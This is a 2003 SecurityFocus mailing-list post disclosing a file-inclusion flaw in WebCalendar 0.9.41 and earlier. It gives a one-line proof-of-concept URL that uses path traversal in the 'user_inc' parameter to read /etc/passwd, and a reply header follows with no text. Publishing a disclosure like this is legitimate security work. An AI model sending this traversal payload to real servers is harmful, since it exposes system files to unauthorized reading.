SecurityFocus

WebCalendar Include File Jul 21 2003 01:20AM
noconflic (nocon texas-shooters com) (1 replies)

Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/

Since this appears to be public info now.

Problem:
http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

Exploit:
http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../
etc/passwd

- nocon
http://nocon.darkflame.net/

[ reply ]

Re: WebCalendar Include File Jul 24 2003 09:51PM
Emmanuel Lacour (elacour easter-eggs com)